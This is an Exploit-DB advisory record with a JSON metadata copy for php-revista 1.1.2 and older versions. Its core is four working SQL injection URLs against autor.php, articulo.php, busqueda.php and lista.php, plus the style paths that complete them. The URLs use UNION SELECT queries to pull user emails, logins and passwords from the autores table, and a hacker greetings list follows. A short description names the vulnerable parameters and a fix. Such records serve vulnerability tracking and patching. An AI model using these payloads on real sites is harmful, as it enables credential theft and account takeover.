ID EDB-ID:3538
Type exploitdb
Reporter Cold Zero
Modified 2007-03-21T00:00:00
Description
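php-revista <= 1.1.2 Multiple Remote SQL Injection Vulnerabilities. Webapps exploit for php platform. The affected parameters shown below are id_autor (autor.php), id_articulo (articulo.php), cadena (busqueda.php) and email (lista.php); each appears to be placed into a SQL query without validation, so the fix is to bind these values as query parameters and cast the numeric ids to integers.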
php-revista <= 1.1.2 Remote SQL Injection Exploit
Found by & contact : Cold z3ro , cold-z3ro@hotmail.com
Affected script (source download) :
http://downloads.sourceforge.net/php-revista/revista-1.1.2.tgz?modtime=1025654400&big_mirror=0
Exploits :
==============================================================================
Http://www.Victem.0/revista/estilo/[STYLE]/autor.php?id_autor=-12 union select null,email,login,pwd,null,null,null,null,null,null,null,null,null from autores where id =1 /*
==============================================================================
Http://www.Victem.0/revista/estilo/[STYLE]/articulo.php?id_articulo=-12 union select null,email,login,pwd,null,null,null,null,null,null,null,null,null from
autores where id =1 /*
==============================================================================
Http://www.Victem.0/revista/estilo/[STYLE]/busqueda.php?cadena='+union select null,email,login,pwd,null,null,null,null,null,null,null,null,null from autores where id =1 /*
==============================================================================
Http://www.Victem.0/revista/estilo/[STYLE]/lista.php?email='+union select null,email,login,pwd,null,null,null,null,null,null,null,null,null from autores where id =1 /*
==============================================================================
Style names ([STYLE] in the paths above) :
/discreet/
/galveston/
/mergedidea/
/Widget_Factory/
/Digital_Multiplex/
==========================================================================================================================================
---- GreeTz: |MoHaNdKo| |Cold One| |Cold ThreE| |Viper Hacker| |The Wolf KSA| |o0xxdark0o| |OrGanza| |H@mLiT| |Snake12| |Root Shell|
|Metoovit| |Fucker_net| |Rageb| |CoDeR| |HuGe| |Str0ke| |Dr.TaiGaR| |BLacK HackErD| |JEeN HacKer| |Nazy L!unx| |KURTEFENDY|
|Spid1r Net| |Big Hacker| |Hacccr| |hacoor| || |Geniral C| |Mr.TyrAnT| |Zax| |Zooz| | Al 3afreat | |The-Falcon-Ksa|
|The Sniper| | DearMan | |Pro Hackers| | 020 | | abdulla00 " alz3eem" | | The_Viper |Kof2002|
All i know
==========================================================================================================================================
Big Thx For : www.4azhar.com , Viva My HomeLand Palestine
Print : Team Hell
# milw0rm.com [2007-03-21]
{"published": "2007-03-21T00:00:00", "id": "EDB-ID:3538", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"vulnersScore": 7.5}, "hash": "67116bb1e473f26f8ec8960ca0467c0d4b0eb163a4a6bdfa2f38ec5659534ac4", "description": "php-revista <= 1.1.2 Multiple Remote SQL Injection Vulnerabilities. Webapps exploit for php platform", "type": "exploitdb", "href": "https://www.exploit-db.com/exploits/3538/", "lastseen": "2016-01-31T18:43:26", "edition": 1, "title": "php-revista <= 1.1.2 - Multiple Remote SQL Injection Vulnerabilities", "osvdbidlist": [], "modified": "2007-03-21T00:00:00", "bulletinFamily": "exploit", "cvelist": [], "sourceHref": "https://www.exploit-db.com/download/3538/", "references": [], "reporter": "Cold Zero", "sourceData": "php-revista <= 1.1.2 Remote SQL Injection Exploit\n\nFound by & contact : Cold z3ro , cold-z3ro@hotmail.com\n\nscript :\nhttp://downloads.sourceforge.net/php-revista/revista-1.1.2.tgz?modtime=1025654400&big_mirror=0\n\n\nExploits :\n==============================================================================\nHttp://www.Victem.0/revista/estilo/[STYLE]/autor.php?id_autor=-12 union select null,email,login,pwd,null,null,null,null,null,null,null,null,null from autores where id =1 /*\n==============================================================================\nHttp://www.Victem.0/revista/estilo/[STYLE]/articulo.php?id_articulo=-12 union select null,email,login,pwd,null,null,null,null,null,null,null,null,null from\nautores where id =1 /*\n==============================================================================\nHttp://www.Victem.0/revista/estilo/[STYLE]/busqueda.php?cadena='+union select null,email,login,pwd,null,null,null,null,null,null,null,null,null from autores where id =1 /*\n==============================================================================\nHttp://www.Victem.0/revista/estilo/[STYLE]/lista.php?email='+union select null,email,login,pwd,null,null,null,null,null,null,null,null,null from 
autores where id =1 /*\n==============================================================================\n\nStyles names :\n/discreet/\n/galveston/\n/mergedidea/\n/Widget_Factory/\n/Digital_Multiplex/\n==========================================================================================================================================\n---- GreeTz: |MoHaNdKo| |Cold One| |Cold ThreE| |Viper Hacker| |The Wolf KSA| |o0xxdark0o| |OrGanza| |H@mLiT| |Snake12| |Root Shell|\n |Metoovit| |Fucker_net| |Rageb| |CoDeR| |HuGe| |Str0ke| |Dr.TaiGaR| |BLacK HackErD| |JEeN HacKer| |Nazy L!unx| |KURTEFENDY|\n |Spid1r Net| |Big Hacker| |Hacccr| |hacoor| || |Geniral C| |Mr.TyrAnT| |Zax| |Zooz| | Al 3afreat | |The-Falcon-Ksa|\n |The Sniper| | DearMan | |Pro Hackers| | 020 | | abdulla00 \" alz3eem\" | | The_Viper |Kof2002|\n All i know\n==========================================================================================================================================\n\n\nBig Thx For : www.4azhar.com , Viva My HomeLand Palestine\n\nPrint : Team Hell\n\n# milw0rm.com [2007-03-21]\n", "objectVersion": "1.0"}
{"result": {}}